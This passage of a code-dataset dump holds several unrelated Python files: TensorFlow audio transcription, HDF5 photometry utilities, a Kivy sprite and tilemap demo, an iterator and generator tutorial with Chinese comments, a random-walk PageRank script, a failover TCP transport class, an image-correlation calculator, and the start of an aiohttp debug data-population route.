tf.train.Coordinator()\n threads = []\n try:\n for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):\n threads.extend(qr.create_threads(sess, coord=coord, daemon=True, start=True))\n\n if not coord.should_stop():\n logits, decoded, plaintext = sess.run([logits_op, decoded_op, plaintext_op],\n feed_dict=feed_dict)\n\n print('Transcriptions {}:\\n{}'.format(plaintext.shape, plaintext))\n\n except Exception as e:\n print('EXCEPTION:', e, ', type:', type(e))\n coord.request_stop(e)\n\n coord.request_stop()\n coord.join(threads, stop_grace_period_secs=120)\n\n\ndef transcribe(wav_file):\n \"\"\"Load an audio file and prepare the TensorFlow graph for inference.\n\n Args:\n wav_file (str): Path to WAV file.\n\n Returns:\n Nothing.\n \"\"\"\n assert os.path.isfile(wav_file)\n\n with tf.Graph().as_default():\n # Get evaluation sequences and ground truth.\n with tf.device('/cpu:0'):\n # Load audio file into tensor.\n sequence, seq_length = load_sample(wav_file)\n\n sequence = [sequence] * FLAGS.batch_size\n sequence_ph = tf.placeholder(dtype=TF_FLOAT,\n shape=[FLAGS.batch_size, None, NUM_FEATURES])\n\n seq_length = [seq_length] * FLAGS.batch_size\n seq_length_ph = tf.placeholder(dtype=tf.int32, shape=[FLAGS.batch_size, ])\n\n feed_dict = {\n sequence_ph: sequence,\n seq_length_ph: seq_length\n }\n\n # Build a graph that computes the logits predictions from the inference model.\n logits_op, seq_length = model.inference(sequence_ph, seq_length_ph, training=False)\n\n decoded_op, plaintext_op, _ = model.decode(logits_op, seq_length, originals=None)\n\n transcribe_once(logits_op, decoded_op, plaintext_op, feed_dict)\n\n\n# noinspection PyUnusedLocal\ndef main(argv=None):\n \"\"\"TensorFlow starting routine.\"\"\"\n for wav_path in WAV_PATHS:\n transcribe(wav_path)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"435578210","text":"import os\nimport h5py\nimport numpy as np\n\ndef write_phot_hd5(setup, dataset_phot_data, log=None,\n filename=None):\n \"\"\"Function to output a dataset photometry table to an HD5 file\"\"\"\n\n if not filename:\n output_path = os.path.join(setup.red_dir,'photometry.hdf5')\n else:\n output_path = os.path.join(setup.red_dir,filename)\n\n with h5py.File(output_path, \"w\") as f:\n dset = f.create_dataset('dataset_photometry',\n dataset_phot_data.shape,\n dtype='float64',\n data=dataset_phot_data)\n f.close()\n\n if log:\n log.info('Output photometry dataset for '+str(setup.red_dir)+\\\n ' with '+repr(dataset_phot_data.shape)+\\\n ' datapoints')\n\ndef read_phot_hd5(setup,log=None, filename=None, return_type='hdf5'):\n \"\"\"Function to read an existing dataset photometry table in HD5 format\n Function returns two zero-length arrays if none is available\"\"\"\n\n if not filename:\n input_path = os.path.join(setup.red_dir,'photometry.hdf5')\n else:\n input_path = os.path.join(setup.red_dir,filename)\n\n if os.path.isfile(input_path):\n f = h5py.File(input_path, \"r\")\n dset = f['dataset_photometry']\n\n if log:\n log.info('Loaded photometry data with '+repr(dset.shape)+\\\n ' datapoints')\n\n if return_type == 'hdf5':\n return dset\n else:\n return np.array(dset[:])\n else:\n if log:\n log.info('No existing photometry available to load')\n\n return np.array([])\n\n\ndef read_phot_from_hd5_file(file_path, return_type='hdf5'):\n \"\"\"Function to read an existing dataset photometry table in HD5 format\n Function returns two zero-length arrays if none is available\"\"\"\n\n if not os.path.isfile(file_path):\n raise IOError('Cannot find input photometry file '+file_path)\n\n f = h5py.File(file_path, \"r\")\n dset = f['dataset_photometry']\n\n if return_type == 'hdf5':\n return dset\n else:\n return np.array(dset[:])\n\ndef read_star_from_hd5_file(file_path, quad_idx):\n \"\"\"Function to read an existing dataset photometry table in HD5 format\n Function returns two zero-length arrays if none is available\"\"\"\n\n dset = read_phot_from_hd5_file(file_path, return_type='hdf5')\n\n return np.array(dset[quad_idx,:,:])\n\ndef load_four_quadrant_photometry(red_dir, file_rootname, verbose=False):\n \"\"\"Function to read the timeseries photometry from all four quadrants\"\"\"\n\n for q in range(1,5,1):\n file_path = os.path.join(red_dir, file_rootname+'_quad'+str(q)+'_photometry.hdf5')\n quad_data = read_phot_from_hd5_file(file_path, return_type='array')\n if q == 1:\n phot_data = quad_data\n else:\n phot_data = np.concatenate((phot_data, quad_data))\n if verbose: print('Read in photometry for quadrant '+str(q))\n\n if verbose: print('Completed read of timeseries photometry: '+repr(phot_data.shape))\n\n return phot_data\n\ndef mask_phot_array(phot_data, col, err_col, qc_col=None):\n \"\"\"Function to create a Numpy masked array based on the results of selecting\n valid photometric entries from a standard-format photometry array.\"\"\"\n\n # Select valid data. Invalid photometry measurements are usually set to\n # -99.0\n selection = np.logical_and(phot_data[:,:,col] > 0.0,\n phot_data[:,:,err_col] > 0.0)\n if qc_col != None:\n selection = np.logical_and(phot_data[:,:,qc_col] == 0.0, selection)\n\n mask = np.invert(selection)\n\n expand_mask = np.empty((mask.shape[0], mask.shape[1], phot_data.shape[2]))\n for col in range(0,expand_mask.shape[2],1):\n expand_mask[:,:,col] = mask\n\n phot_data = np.ma.masked_array(phot_data, mask=expand_mask)\n\n return phot_data\n\ndef unmask_phot_array(phot_data):\n \"\"\"Function to unmask a masked photometry array. Convienence wrapper\n for np.ma function to match the syntax used for the masking function\"\"\"\n return np.ma.getdata(phot_data)\n\ndef write_normalizations_hd5(red_dir, file_prefix, normalizations):\n \"\"\"Function to output a per-star, per-dataset normalization coefficients\n tables to an HD5 file.\n\n The structure of the tables output have the columns:\n field_id, delta_mag_, delta_mag_error_, delta_mag_, ...\n where the datasets are listed in the same order as the datasets table\n in the CrossMatchTable.\n \"\"\"\n\n output_path = os.path.join(red_dir,\n file_prefix+'_star_dataset_normalizations.hdf5')\n\n column_names = []\n with h5py.File(output_path, \"w\") as f:\n for dset_code, table in normalizations.items():\n data = np.zeros((len(table),len(table.colnames)))\n for c,cname in enumerate(table.colnames):\n data[:,c] = table[cname]\n if len(column_names) == 0:\n column_names = table.colnames\n dset = f.create_dataset(dset_code,\n data.shape,\n dtype='float64',\n data=data)\n f.close()\n","sub_path":"pyDANDIA/hd5_utils.py","file_name":"hd5_utils.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406213098","text":"\"\"\"kvcheetah - Testing Framework\"\"\"\n\nfrom math import cos, radians, sin\nimport os\nfrom random import randint, random\n\nfrom kivy.app import App, Builder\nfrom kivy.clock import Clock\nfrom kivy.core.audio import SoundLoader\nfrom kivy.factory import Factory\nfrom kivy.uix.screenmanager import Screen, ScreenManager, SlideTransition\n\nfrom kvcheetah import __file__, __version__\nfrom kvcheetah.graphics.sprite import Sprite\nfrom kvcheetah.graphics.tilemap import TileMap\n\n#Ensure that the current working directory is the package directory\nos.chdir(os.path.dirname(__file__))\n\n\n#Globals\n#==============================================================================\nKVLANG = \"\"\"\n:\n demo_area: DemoArea\n\n BoxLayout:\n orientation: \"vertical\"\n\n Button:\n text: \"Menu\"\n size_hint_y: .1\n on_release: self.parent.parent.menu()\n\n StencilView:\n id: DemoArea\n\n\n:\n pos_lbl: PosLabel\n joystick: Joystick\n\n Label:\n id: PosLabel\n text: \"Joystick Pos: (0, 0)\"\n center: self.center\n\n VirtualJoystick:\n id: Joystick\n size_hint: (None, None)\n pos: (50, 50)\n size: (100, 100)\n\n\n:\n Screen:\n name: \"Menu\"\n\n BoxLayout:\n orientation: \"vertical\"\n\n Label:\n text: \"Choose a demo below:\"\n size_hint_y: .1\n\n ScrollView:\n BoxLayout:\n orientation: \"vertical\"\n\n Button:\n text: \"Sprite Demo\"\n on_release: root.switch_screen(\"SpriteDemo\")\n\n Button:\n text: \"Sprite Color Demo\"\n on_release: root.switch_screen(\"SpriteColorDemo\")\n\n Button:\n text: \"TileMap Demo\"\n on_release: root.switch_screen(\"TileMapDemo\")\n\n Button:\n text: \"Joystick Demo\"\n on_release: root.switch_screen(\"JoystickDemo\")\n\n SpriteDemo:\n name: \"SpriteDemo\"\n\n SpriteColorDemo:\n name: \"SpriteColorDemo\"\n\n TileMapDemo:\n name: \"TileMapDemo\"\n\n JoystickDemo:\n name: \"JoystickDemo\"\n\"\"\"\nPOP_SND = SoundLoader.load(\"data/sfx/bubble-pop.wav\")\n\n\n#Classes\n#==============================================================================\nclass Bubble(Sprite):\n \"\"\"Base class for a bubble.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this bubble.\"\"\"\n super(Bubble, self).__init__(**kwargs)\n self.pos = (\n randint(32, int(self.parent.width) - 32),\n randint(32, int(self.parent.height) - 32)\n )\n self.size = (64, 64)\n self.origin = (32, 32)\n self.source = \"atlas://data/images/sprites/bubble\"\n self.velocity = (\n 2 * cos(radians(randint(0, 359))),\n 2 * sin(radians(randint(0, 359)))\n )\n self._hp = 10\n self._destroy_cb = None\n\n #Process keyword args\n if \"destroy_cb\" in kwargs:\n self.destroy_cb = kwargs[\"destroy_cb\"]\n\n def get_hp(self):\n \"\"\"Get the HP of this bubble.\"\"\"\n return self._hp\n\n def set_hp(self, value):\n \"\"\"Set the HP of this bubble.\"\"\"\n self._hp = value\n\n if value <= 0:\n try:\n POP_SND.seek(0)\n POP_SND.play()\n\n except Exception:\n pass\n\n self.source = \"atlas://data/images/sprites/bubble-pop\"\n self.velocity = (0, 0)\n Clock.schedule_once(self.destroy, .5)\n\n hp = property(get_hp, set_hp)\n\n def get_destroy_cb(self):\n \"\"\"Get the destroy callback for this bubble.\"\"\"\n return self._destroy_cb\n\n def set_destroy_cb(self, value):\n \"\"\"Set the destroy callback for this bubble.\"\"\"\n self._destroy_cb = value\n\n destroy_cb = property(get_destroy_cb, set_destroy_cb)\n\n def invert_velocity(self):\n \"\"\"Invert the velocity of this bubble.\"\"\"\n vx, vy = self.velocity\n self.velocity = (-vx, -vy)\n\n def destroy(self, t):\n \"\"\"Destroy this bubble.\"\"\"\n try:\n self.destroy_cb(self)\n\n except Exception:\n pass\n\n def update(self):\n \"\"\"Update this bubble.\"\"\"\n #Update velocity\n x, y = self.pos\n vx, vy = self.velocity\n\n if x < 32 or x > self.parent.width - 33:\n vx = -vx\n\n if y < 32 or y > self.parent.height - 33:\n vy = -vy\n\n self.velocity = (vx, vy)\n super(Bubble, self).update()\n\n\nclass Pin(Sprite):\n \"\"\"Base class for a pin.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this pin.\"\"\"\n super(Pin, self).__init__(**kwargs)\n self.size = (10, 64)\n self.origin = (5, 64)\n self.source = \"atlas://data/images/sprites/pin\"\n\n\nclass Egg(Sprite):\n \"\"\"Base class for an egg.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this egg.\"\"\"\n super(Egg, self).__init__(**kwargs)\n self.size = (48, 64)\n self.origin = (24, 32)\n self.source = \"atlas://data/images/sprites/egg\"\n\n\nclass Ball(Sprite):\n \"\"\"Base class for a ball.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this ball.\"\"\"\n super(Ball, self).__init__(**kwargs)\n self.pos = (self.parent.width / 2, self.parent.height)\n self.size = (64, 64)\n self.origin = (32, 32)\n self.velocity = (0, -2)\n self.source = \"atlas://data/images/sprites/ball\"\n\n def update(self):\n \"\"\"Update this ball.\"\"\"\n #Update velocity\n vx, vy = self.velocity\n vy -= 1\n \n if vy > 16:\n vy = 16\n\n if self.parent.parent.parent.tilemap.hit(self) > 0:\n vy = -vy\n\n self.velocity = (vx, vy)\n super(Ball, self).update()\n\n\nclass DemoBase(Screen):\n \"\"\"Base class for a demo screen.\"\"\"\n def menu(self):\n \"\"\"Return to the main menu.\"\"\"\n self.parent.switch_screen(\"Menu\")\n\n\nclass SpriteDemo(DemoBase):\n \"\"\"A simple sprite demo.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this demo.\"\"\"\n super(SpriteDemo, self).__init__(**kwargs)\n self.spawn_tmr = 0\n\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Creat the pin\n self.pin = Pin(parent = self.demo_area)\n\n #Init bubble collection\n self.bubbles = []\n\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n #Destroy bubbles\n self.bubbles = None\n\n #Destroy pin\n self.pin = None\n\n def on_touch_down(self, touch):\n \"\"\"Handle touch down event.\"\"\"\n super(SpriteDemo, self).on_touch_down(touch)\n self.pin.pos = (touch.x, touch.y)\n self.pin.show(True)\n\n def on_touch_up(self, touch):\n \"\"\"Handle touch up event.\"\"\"\n super(SpriteDemo, self).on_touch_up(touch)\n self.pin.show(False)\n\n def on_touch_move(self, touch):\n \"\"\"Handle touch move event.\"\"\"\n super(SpriteDemo, self).on_touch_move(touch)\n self.pin.pos = (touch.x, touch.y)\n\n def spawn_bubble(self):\n \"\"\"Spawn a new bubble.\"\"\"\n #Update spawn timer\n self.spawn_tmr -= 1\n\n #Spawn a new bubble if the timer has expired and there are less than 10\n #bubbles.\n if self.spawn_tmr <= 0 and len(self.bubbles) < 10:\n self.bubbles.append(Bubble(\n parent = self.demo_area,\n destroy_cb = self.destroy_bubble\n ))\n self.bubbles[-1].show(True)\n self.spawn_tmr = 100\n\n def destroy_bubble(self, bubble):\n \"\"\"Destroy the given bubble.\"\"\"\n self.bubbles.remove(bubble)\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n #Spawn a new bubble\n self.spawn_bubble()\n\n #Update bubbles\n for bubble in self.bubbles:\n #Update bubble\n bubble.update()\n\n #Do collision detection\n if bubble.hit(self.pin):\n bubble.hp = 0\n continue\n\n for bubble2 in self.bubbles:\n if bubble2.hp > 0 and bubble.hit(bubble2, \"circle\"):\n bubble.invert_velocity()\n bubble.hp -= 1\n\n\nclass SpriteColorDemo(DemoBase):\n \"\"\"A sprite color demo.\"\"\"\n def __init__(self, **kwargs):\n \"\"\"Setup this demo.\"\"\"\n super(SpriteColorDemo, self).__init__(**kwargs)\n self.color_tmr = 0\n\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Create the egg\n self.egg = Egg(parent = self.demo_area)\n self.egg.pos = (self.width / 2, self.height / 2)\n self.egg.show(True)\n\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n #Destroy the egg\n self.egg = None\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n #Update color change timer\n self.color_tmr -= 1\n\n #Change the egg color if the timer has expired\n if self.color_tmr <= 0:\n self.egg.color = (\n randint(0, 255) / 255,\n randint(0, 255) / 255,\n randint(0, 255) / 255,\n 1\n )\n self.color_tmr = 30\n\n\nclass TileMapDemo(DemoBase):\n \"\"\"A tilemap demo.\"\"\"\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Init tileset and map data\n tileset = [\n \"atlas://data/images/tiles/blank\",\n \"atlas://data/images/tiles/dirt\",\n \"atlas://data/images/tiles/grass\",\n \"atlas://data/images/tiles/dirt-slope1\",\n \"atlas://data/images/tiles/dirt-slope2\",\n \"atlas://data/images/tiles/grass-slope1\",\n \"atlas://data/images/tiles/grass-slope2\",\n \"atlas://data/images/tiles/grass-slope-base1\",\n \"atlas://data/images/tiles/grass-slope-base2\"\n ]\n map_data = [[0 for x in range(128)] for y in range(128)]\n\n #Add dirt tiles\n for y in range(2):\n for x in range(128):\n map_data[y][x] = 1\n\n #Add grass tiles\n for x in range(128):\n map_data[2][x] = 2\n\n #Add a small hill\n map_data[2][29] = 7\n map_data[3][29] = 5\n map_data[2][30] = 1\n map_data[3][30] = 7\n map_data[4][30] = 5\n map_data[2][31] = 1\n map_data[3][31] = 1\n map_data[4][31] = 7\n map_data[5][31] = 5\n\n #Create the tilemap\n self.tilemap = TileMap(\n parent = self.demo_area,\n tileset = tileset,\n map_data = map_data\n )\n self.tilemap.show(True)\n\n #Create a ball\n self.ball = Ball(parent = self.demo_area)\n self.ball.show(True)\n\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n #Destroy the ball\n self.ball = None\n\n #Destroy the tilemap\n self.tilemap = None\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n #Scroll the tilemap horizontally\n x, y = self.tilemap.offset\n x += 2\n self.tilemap.offset = (x, y)\n\n #Update the ball\n self.ball.update()\n\n\nclass JoystickDemo(DemoBase):\n \"\"\"A joystick demo.\"\"\"\n def on_enter(self):\n \"\"\"Handle enter event.\"\"\"\n #Start the demo\n self.frame_event = Clock.schedule_interval(self.update, 1 / 60)\n\n def on_leave(self):\n \"\"\"Handle leave event.\"\"\"\n #Stop the demo\n self.frame_event.cancel()\n\n def update(self, t):\n \"\"\"Update this demo.\"\"\"\n self.pos_lbl.text = \"Joystick Pos: {}\".format(self.joystick.joy_pos)\n\n\nclass MainScreen(ScreenManager):\n \"\"\"The main screen of this app.\"\"\"\n def switch_screen(self, name):\n \"\"\"Switch to the given screen.\"\"\"\n if name == \"Menu\":\n self.transition = SlideTransition(direction = \"right\")\n\n else:\n self.transition = SlideTransition(direction = \"left\")\n\n self.current = name\n\n\nclass KvCheetahApp(App):\n \"\"\"A basic app class.\"\"\"\n def build(self):\n \"\"\"Build the UI for this app.\"\"\"\n self.title = \"KvCheetah v{}\".format(__version__)\n Builder.load_string(KVLANG)\n return MainScreen()\n\n\n#Register classes\n#==============================================================================\nFactory.register(\"SpriteDemo\", SpriteDemo)\n\n\n#Entry Point\n#==============================================================================\nKvCheetahApp().run()\n","sub_path":"android/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"464163998","text":"#!/usr/bin/python3\n# coding=utf-8\n\n'''\n\n迭代器\n迭代是Python最强大的功能之一,是访问集合元素的一种方式。。\n迭代器是一个可以记住遍历的位置的对象。\n迭代器对象从集合的第一个元素开始访问,直到所有的元素被访问完结束。迭代器只能往前不会后退。\n迭代器有两个基本的方法:iter() 和 next()。\n\n'''\n\n\n# 字符串和数组对象都可以用于创建迭代器对象.\n# 注意 : 迭代器,最开始指向第一个元素前面一个的位置.并不是指向第一个元素\nlist1 = [1,2,3,4,5]\nit = iter(list1) # 创建迭代器对象.\nprint(next(it)) # 输出迭代器的下一个对象\n\n# 使用for遍历\nfor x in it:\n print(x,end= \" \")\n\n# 使用 next\nprint(\"\\n使用 next\")\n# import sys # 引入 sys模块\n# it1 = iter(list1)\n# while True: # 死循环.\n# try:\n# print(next(it1) ,end=\" \") # 打印下一个元素,没有则发生异常.\n# except StopIteration:\n# sys.exit() # 异常退出\n\n\n\n'''\n生成器\n 1. 在 Python 中,使用了 yield 的 函数 被称为生成器(generator)。\n 2. 跟普通函数不同的是,生成器是一个返回迭代器的函数,只能用于迭代操作,更简单点理解生成器就是一个迭代器。\n 3. 在调用生成器运行的过程中,每次遇到 yield 时函数会暂停并保存当前所有的运行信息,\n 4. 返回yield的值。并在下一次执行 next()方法时从当前位置继续运行。\n'''\n\n\n# yield 实现斐波那契数列\n\nprint('\\nyield 实现斐波那契数列')\nimport sys\n\ndef fibonacci(n): # 生成器函数,斐波那契数列\n a,b,counter = 0,1,0\n while True:\n if counter > n:\n return\n yield a # 会返回 a 的值并且保存当前现场信息,等待下次next时继续执行.\n a, b = b, a + b\n counter += 1\n\n\nf = fibonacci(10) # f是一个迭代器\nprint('f 的类型 : ', type(f))\n\n# 遍历.\nfor x in f :\n print(x, end=' ')\nprint('\\n')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python 3.x/迭代器与生成器.py","file_name":"迭代器与生成器.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"157128119","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 11 10:04:42 2020\r\n\r\n@author: bijuangalees\r\n\"\"\"\r\nimport networkx as nx\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport operator\r\n\r\nG=nx.gnp_random_graph(10,0.5,directed =True)\r\nnx.draw(G)\r\nplt.show\r\n#x is the random source node \r\nx=random.choice([i for i in range(G.number_of_nodes())])\r\ndict_counter={}\r\nfor i in range(G.number_of_nodes()):\r\n dict_counter[i]=0\r\ndict_counter[x]=dict_counter[x]+1\r\nfor i in range(100000):\r\n list_n=list(G.neighbors(x))\r\n if (len(list_n)==0):# if x is a sink\r\n x=random.choice([i for i in range(G.number_of_nodes())])\r\n dict_counter[x]=dict_counter[x]+1\r\n else:\r\n x=random.choice(list_n) #choose a node randomly from\r\n dict_counter[x]=dict_counter[x]+1\r\np=nx.pagerank(G)\r\nsorted_p=sorted(p.items(),key=operator.itemgetter(1))\r\nsorted_rw=sorted(dict_counter.items(),key=operator.itemgetter(1))\r\nprint(dict_counter)\r\n \r\n","sub_path":"pyweek12/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"88410193","text":"from JumpScale import j\nimport JumpScale.baselib.serializers\nimport JumpScale.grid.serverbase\nfrom JumpScale.grid.serverbase.DaemonClient import Transport\nimport time\n\ndef retry(func):\n def wrapper(self, *args, **kwargs):\n try:\n if j.system.net.tcpPortConnectionTest(*self._connection[:2]):\n clientfunc = getattr(self._client, func.__name__)\n return clientfunc(*args, **kwargs)\n except:\n pass # we will execute the reconnect\n self._connection[2] = time.time()\n self.connect(self._id)\n clientfunc = getattr(self._client, func.__name__)\n return clientfunc(*args, **kwargs)\n return wrapper\n\nclass TCPHATransport(Transport):\n def __init__(self, connections, clientclass, timeout=None, *args, **kwargs):\n self._connections = [ [ip, port, 0] for ip, port in connections ]\n self._timeout = timeout\n self._args = args\n self._kwargs = kwargs\n self._clientclass = clientclass\n self._client = None\n self._connection = None\n self._id = None\n\n def connect(self, sessionid):\n if self._client:\n self._client.close()\n for attempt in range(2):\n for connection in sorted(self._connections, key=lambda c: c[-1]):\n try:\n if j.system.net.tcpPortConnectionTest(*connection[:2]):\n self._id = sessionid\n ip, port, timestamp = connection\n args = list(connection[:-1]) + list(self._args)\n client = self._clientclass(*args, **self._kwargs)\n client.connect(sessionid)\n self._connection = connection\n self._client = client\n return\n except Exception as e:\n print((\"Error occured %s\" % e))\n pass # invalidate the client\n if self._client:\n self._client.close()\n connection[2] = time.time()\n ips = [ \"%s:%s\" % (con[0], con[1]) for con in self._connections ]\n msg = \"Failed to connect to %s\" % (\", \".join(ips))\n j.events.opserror_critical(msg)\n\n @retry\n def sendMsg(self, category, cmd, data, sendformat=\"\", returnformat=\"\",timeout=None):\n pass\n\n def close(self):\n if self._client:\n self._client.close()\n\n def __str__(self):\n return \"%s %s\" % (self.__class__.__name__, self._connections)\n","sub_path":"lib/JumpScale/grid/serverbase/TCPHATransport.py","file_name":"TCPHATransport.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"233029979","text":"import os\r\nimport cv2\r\nimport numpy as np\r\nimport csv\r\n\r\n\r\ndef getMean(X):\r\n return np.round(np.mean(X), 2)\r\n\r\n\r\ndef getVar(X):\r\n return np.round(np.var(X), 2)\r\n\r\n\r\ndef getCovXY(X, Y):\r\n return np.round(np.cov(X, Y,)[0, 1], 2)\r\n # return np.round(np.cov(X, Y, bias=True)[0, 1], 2) 原本的\r\n\r\n\r\ndef getCorrelationXY(var_x, var_y, cov_x_y):\r\n correlation_x_y = cov_x_y/((var_x*var_y)**(1/2))\r\n return np.round(correlation_x_y, 6)\r\n # return np.round(np.corrcoef(X,Y)), 6) 原本的\r\n\r\n\r\ndef caculate(X, Y):\r\n x = getMean(X)\r\n y = getMean(Y)\r\n var_x = getVar(X)\r\n var_y = getVar(Y)\r\n cov_x_y = getCovXY(X, Y)\r\n correlation_x_y = getCorrelationXY(var_x, var_y, cov_x_y)\r\n # print(x, y, var_x, var_y, cov_x_y, correlation_x_y)\r\n return x, y, var_x, var_y, cov_x_y, correlation_x_y\r\n\r\n\r\ndef getHD(name, channel, arr):\r\n # test\r\n # print(arr.shape)\r\n # print(arr[0, 1])\r\n # print(arr[2, 1])\r\n X = arr[:, :arr.shape[1]-1].reshape(-1)\r\n # print(X)\r\n Y = arr[:, 1:].reshape(-1)\r\n # print(Y)\r\n\r\n x, y, var_x, var_y, cov_x_y, correlation_x_y = caculate(X, Y)\r\n return [name, 'HD', channel, x, y, var_x, var_y, cov_x_y, correlation_x_y]\r\n\r\n\r\ndef getVD(name, channel, arr):\r\n X = arr[:arr.shape[0]-1, :].reshape(-1)\r\n # print(X)\r\n Y = arr[1:, :].reshape(-1)\r\n # print(Y)\r\n x, y, var_x, var_y, cov_x_y, correlation_x_y = caculate(X, Y)\r\n return [name, 'VD', channel, x, y, var_x, var_y, cov_x_y, correlation_x_y]\r\n\r\n\r\ndef getDD(name, channel, arr):\r\n X = arr[:arr.shape[0]-1, :arr.shape[1]-1].reshape(-1)\r\n # print(X)\r\n Y = arr[1:, 1:].reshape(-1)\r\n # print(Y)\r\n x, y, var_x, var_y, cov_x_y, correlation_x_y = caculate(X, Y)\r\n return [name, 'DD', channel, x, y, var_x, var_y, cov_x_y, correlation_x_y]\r\n\r\n\r\ndef getOutput(name, img):\r\n csv_output = []\r\n # print(img.shape)\r\n\r\n # test\r\n # img = np.array([[88, 27, 196], [21, 61, 12], [183, 113, 125]])\r\n # csv_output.append(getHD(name, 'R', img))\r\n # csv_output.append(getVD(name, 'R', img))\r\n # csv_output.append(getDD(name, 'R', img))\r\n\r\n csv_output.append(getHD(name, 'R', img[:, :, 2]))\r\n csv_output.append(getHD(name, 'G', img[:, :, 1]))\r\n csv_output.append(getHD(name, 'B', img[:, :, 0]))\r\n\r\n csv_output.append(getVD(name, 'R', img[:, :, 2]))\r\n csv_output.append(getVD(name, 'G', img[:, :, 1]))\r\n csv_output.append(getVD(name, 'B', img[:, :, 0]))\r\n\r\n csv_output.append(getDD(name, 'R', img[:, :, 2]))\r\n csv_output.append(getDD(name, 'G', img[:, :, 1]))\r\n csv_output.append(getDD(name, 'B', img[:, :, 0]))\r\n # for i in csv_output:\r\n # print(i)\r\n return csv_output\r\n\r\n\r\ndef toCsvOutput(ori_dir, enc_dir, csv_name):\r\n csv_text = [['Image Name', 'Mode', 'Channel', 'x_bar', 'y_bar',\r\n 'VAR(X)', 'VAR(Y)', 'COV(X, Y)', 'Correlation(X,Y)']]\r\n for ori_name, enc_name in zip(os.listdir(ori_dir), os.listdir(enc_dir)):\r\n ori_img = cv2.imread(ori_dir+ori_name, cv2.IMREAD_COLOR)\r\n enc_img = cv2.imread(enc_dir+enc_name, cv2.IMREAD_COLOR)\r\n for i in getOutput(ori_name, ori_img):\r\n csv_text.append(i)\r\n\r\n for i in getOutput(enc_name, enc_img):\r\n csv_text.append(i)\r\n # break\r\n\r\n with open(csv_name, 'w', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerows(csv_text)\r\n\r\n\r\ntoCsvOutput(\"13-Images/Origi_image/\", \"13-Images/Encry_image/\", \"output13.csv\")\r\n","sub_path":"hw13/4107056005-13-DEC_MAT3.py","file_name":"4107056005-13-DEC_MAT3.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"583494350","text":"\nimport asyncio\nfrom aiohttp import web\nfrom aiohttp_session import get_session, new_session\nimport aiohttp_jinja2\nfrom aiohttp import ClientSession\n\nfrom bson.objectid import ObjectId\nimport json\nimport datetime\n\nfrom util import routes, get_user, to_objectid\nfrom backend import users, friends, comments, history, shares, playlists, videos\nfrom youtube import Youtube\n\nyoutube = Youtube()\n\n# TODO: disable debugging code\n\n@routes.get('/debug:populate')\nasync def debug_populate(request):\n import backend\n await backend.clear_all()\n # generate random users with personal data\n async with ClientSession() as session:\n async with session.get('https://randomuser.me/api/?results=100&nat=AU') as response:\n data = await response.json()\n for i, user in enumerate(data['results']):\n password = user['login']['password']\n email = user['email']\n name = user['name']['first'].title() + ' ' + user['name']['last'].title()\n #picture = '/static/img/person%d.jpg' % i \n picture = user['picture']['large']\n await users.add(password=password, email=email, name=name, picture=picture, origin='generated')\n # populate usage data for each user\n user_ids = [user['_id'] for user in await users.list()]\n print(user_ids)\n\n # get random data to sample from\n with open('debug-data/youtube_ids.txt') as fp:\n random_videos = [line.strip() for line in fp]\n with open('debug-data/laurem.txt') as fp:\n paragraphs = [line.strip() for line in fp]\n with open('debug-data/queries.txt') as fp:\n queries = [line.strip() for line in fp]\n with open('debug-data/folders.txt') as fp:\n folder_names = [line.strip().capitalize() for line in fp]\n\n import random\n video_ids = []\n async def populate_one_user(user_id):\n folders = []\n for i in range(random.randint(1, 5)):\n name = random.choice(folder_names)\n folders.append(await playlists.add_folder(user_id, name))\n # generate random friend connections\n friend_ids = []\n for num in range(random.randint(1, 8)):\n other_id = random.choice(user_ids)\n if other_id != user_id:\n request = True if random.random() > .5 else False\n await friends.add(user_id, other_id, request)\n if not request:\n friend_ids.append(other_id)\n print('FRIENDS:', friend_ids)\n # generate 